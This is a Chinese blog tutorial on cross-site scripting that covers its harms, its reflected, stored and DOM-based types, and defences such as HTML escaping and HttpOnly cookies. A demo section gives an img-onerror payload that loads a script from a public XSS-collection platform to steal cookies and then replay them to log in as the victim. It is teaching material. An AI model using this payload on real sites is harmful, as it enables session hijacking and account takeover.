XSS攻击

最新推荐文章于 2024-05-22 10:49:06 发布
最新推荐文章于 2024-05-22 10:49:06 发布
阅读量169 收藏
点赞数
分类专栏: 前端 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_26872161/article/details/101053840
版权

1、XSS

XSS(Cross Site Scripting)攻击全称跨站脚本攻击,为了不与CSS(Cascading Style Sheets)混淆,故将跨站脚本攻击缩写为XSS,XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。
通俗的来说就是我们的页面在加载并且渲染绘制的过程中,如果加载并执行了意料之外的程序或代码(脚本、样式),就可以认为是受到了 XSS攻击。

  • XSS更多是发生在web前端的一种漏洞,所以危害的对象主要还是前端用户。
    XSS

2、XSS的危害

  • 挂马。
  • 盗取用户Cookie、账号等信息。
  • DOS(拒绝服务)客户端浏览器。
  • 前端JS挖矿。
  • 钓鱼攻击,高级的钓鱼技巧。
  • 删除目标文章、恶意篡改数据、嫁祸。
  • 劫持用户Web行为,甚至进一步渗透内网。
  • 爆发Web2.0蠕虫。
  • 蠕虫式的DDoS攻击。
  • 蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据

3、XSS分类

  • 反射型:
    也叫非持久型XSS,交互数据一般不会被存在数据库里面,一次性,所见即所得。一般XSS代码出现在请求URL中,作为参数提交到服务器,服务器解析并响应,响应结果中包含XSS代码,最后浏览器解析并执行。

    场景:
    1、用户A给用户B发送一个恶意构造了Web的URL。
    2、用户B点击并查看了这个URL。
    3、用户B获取到一个具有漏洞的HTML页面并显示在本地浏览器中。
    4、漏洞HTML页面执行恶意JavaScript脚本,将用户B信息盗取发送给用户A,或者篡改用户B看到的数据等。
    反射型XSS

  • 存储型:
    也叫持久型XSS,主要将XSS代码提交存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码。当目标用户访问该页面获取数据时,XSS代码会从服务器解析之后加载出来,返回到浏览器做正常的HTML和JS解析执行,XSS攻击就发生了。
    场景:
    1、用户A在网页上创建了某个账户,并且账户信息中包含XSS代码。
    2、用户B访问该网站查看XSS代码账户详情页面。
    3、服务端返回账户详情页面,和带XSS账户信息。
    4、用户B浏览器执行XSS代码,将用户B信息盗取发送给用户A,或者篡改用户B看到的数据等。
    存储型XSS

  • DOM型
    一种特殊的反射型XSS。由客户端的脚本程序可以动态地检查和修改页面内容,而不依赖于服务器端的数据。一般从url中提取数据中含xss,未过滤并在本地执行dom的渲染操作,输入来源多是document.location、document.URL、document.URLUnencoded、document.referrer、window.location等,而触发api多是document.write()、document.writeln()、document.innerHtml、eval()、window.execScript()、window.setInterval()、window.setTimeout()等。
    场景:
    1、用户B访问网站url中带有XSS代码参数。
    2、浏览器下载该网站JavaScript脚本。
    3、JavaScript脚本有个方法获取URL中XSS代码参数,并且用innerHtml渲染在dom中。
    4、触发XSS代码,造成XSS攻击,cookie数据失窃。
    DOM型XSS

4、示例分析

1、入参不严谨,对入参没做任何规则校验。

2、用参太随意,对未知参数未过滤,直接丢给dom操作。

漏洞演示:机密性 - 窃取用户cookie信息

  • 步骤1:借助https://xss.fbisb.com平台,创建项目test步骤1

  • 步骤2:再利用平台提供的xss代码:https://xss.fbisb.com/JGtp

  • 步骤3:新建含xss代码的账户:<img src=x οnerrοr=s=createElement(‘script’);body.appendChild(s);s.src=‘xss代码的url’;>步骤3

  • 步骤4:别的用户登录查看包含该账户名的日志信息,触发XSS步骤4

  • 步骤5:fbisb.com平台获取到用户cookie信息步骤5

  • 步骤6:利用无痕浏览器访问目标网站,将cookie信息写入,免登陆进入平台

5、如何避免XSS攻击

  1. innerHTML(原生)、v-html(vue)、dangerouslySetInnerHTML(react)等直接渲染html的函数慎用,确保渲染的数据是由前端写死的、无危害的才可直接使用;
  2. 使用innerHTML(原生)、v-html(vue)、dangerouslySetInnerHTML(react)等直接渲染html的函数渲染请求数据时,需要先把字符串转义:
    1)、把 > 替换成 &gt;
    2)、把 < 替换成 &lt;
    3)、把 & 替换成 &amp``;
    4)、把 " 替换成 &quot``;
    5)、把 ’ 替换成 &#39``;
  3. 字符过滤:
    1)、过滤掉特殊的HTML标签,例如<script><iframe>等;
    2)、过滤掉Javascript事件标签,例如"onclick""onfocus"等;
  4. Http Only cookie;
  5. 输入检查:对产品输入要求格式严谨检查过滤;

6、讨论&思考

1.学习规范安全编码
根在人为,如果没有规范的学习过前端知识,特别是安全规范知识,直接跨端做前端开发的时候,很多时候知道一个功能怎么去实现,然后百度找api,找到api发现可以使用即可,通常会发生为了实现功能而忽略安全。所以我们在找到可用api时,还得查历该api是否存在安全隐患,需要如何规避、或者有其他更安全的api。

2.对不可信数据保持敏感
对于任何非前端代码数预置数据,保持敏感对待,是否用于dom操作渲染,如果是则需要做相应的过滤处理,或者换其他安全实现方式。

Chen_X贱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss攻击
qq_46312220的博客
08-18 286
2.1 Xss(跨站脚本攻击) 2.1.1 原理 恶意web用户通过将恶意脚本代码植入到提供给其他用户使用的页面来达到攻击的目的 2.1.2 攻击类型: 反射型:通过把恶意代码放入url进行注入,后端解析url并将恶意的代码拼接到html返回给浏览器,浏览器由于无法识别哪些是恶意代码就会解析执行。由于只有点击了这种带有恶意代码的url后攻击才能生效,所有攻击者往往诱导被攻击者点击攻击者指定的特色url。 存储型又称持久型:攻击者通过技术博客的评论,留言,以及各种可能的方式将恶意代码提交到数据
XSS 攻击
wuli1024的博客
01-03 1659
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。
什么是XSS攻击XSS跨站脚本攻击及防护(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-22 2224
XSS(Cross-Site Scripting,跨站脚本攻击)是一种代码注入攻击。攻击者在目标网站上注入恶意代码,当用户(被攻击者)登录网站时就会执行这些恶意代码,通过这些脚本可以读取cookie,session tokens,或者网站其他敏感的网站信息,对用户进行钓鱼欺诈。XSS玫击原理XSS是指攻击者在网页嵌入客户端脚本,通常是JavaScript 编写的恶意代码,也有使用其他客户端脚本语言编写的。当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。
Java防止xss攻击附相关文件下载
08-25
Java防止XSS攻击的核心策略是确保用户输入的数据在显示到网页上之前被适当地编码、转义或过滤,以防止恶意脚本被执行。XSS(跨站脚本)攻击是由于网页应用程序未能正确处理用户输入的数据,使得攻击者能够注入恶意...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击(XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
防止XSS攻击解决办法
01-20
防止XSS攻击是保护Web应用安全的重要一环,对于任何Web开发者来说都是必备的知识。 一、XSS攻击类型 XSS攻击主要分为三类:反射型XSS、存储型XSS和DOM型XSS。 1. 反射型XSS:攻击者通过构造恶意链接,诱使用户点击...
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
04-07
PDF-XSS实例文件
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常现在web应用的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
前端安全之XSS攻击
weixin_34381666的博客
02-18 1154
XSS(cross-site scripting跨域脚本攻击)攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”。有人将XSS攻击分为三种,分别是: 1. Reflected XSS(基于反射的XSS攻击) 2. Stored XSS(基于存储的XSS攻击) 3. DOM-based or local XSS(基于DOM或本地的XSS攻击) Reflected XSS 基于反射的...
DoS攻击
后台开发
08-25 1万+
XSS攻击(Cross Site Scripting) 全称跨站脚本攻击 攻击者主要通过嵌入恶意脚本程序,当用户打开网页时,脚本程序便在客户端的浏览器执行,以盗取客户端cookie,用户名密码,下载执行病毒木马程序等 <input type="text" name="nick" value=" "/><script>alert("你是煞笔")</script><!-" ">【value传值传入sricpt脚本】 防御手段: XSS之所以能...
XSS跨站脚本攻击(一)----XSS攻击的三种类型
热门推荐
fendo
12-27 12万+
一、简介 什么是XSS? 百度百科的解释: XSS又叫CSS  (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 它与SQL注入攻击类似,SQL注入攻击以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在x
xss攻击 beef
09-06
XSS攻击是一种跨站脚本攻击,它利用网页应用程序对用户输入的信任来注入恶意的客户端脚本。而beef则是一种用于进行XSS攻击的平台。beef-xss是beef平台的一部分,它允许攻击者在受害者的浏览器执行恶意代码。 使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值